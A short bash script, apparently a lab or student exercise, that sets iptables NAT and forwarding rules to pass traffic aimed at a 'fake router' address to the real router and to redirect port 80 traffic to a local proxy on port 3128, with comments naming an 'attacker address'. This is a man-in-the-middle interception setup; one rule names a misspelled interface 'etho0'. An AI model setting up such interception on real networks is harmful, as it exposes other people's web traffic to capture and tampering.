#!/bin/bash

#arguments are as follows: fake router ip, real router ip, our ip

###Enable port forwarding
#echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward

###Forwarding rules applied Here!
##Initial Rule Forwards all traffic:
##if I understand this correctly we should be sorting on traffic headed to the attacker address.

iptables -A FORWARD -i etho0 -d $1 -j ACCEPT

iptables -t nat -A PREROUTING -d $1 -j DNAT --to-destination $2

iptables -t nat -A POSTROUTING -s $2 -j SNAT --to-source $3

iptables -t nat -A PREROUTING -p tcp -i eth0 --dport 80 -j REDIRECT --to-port 3128
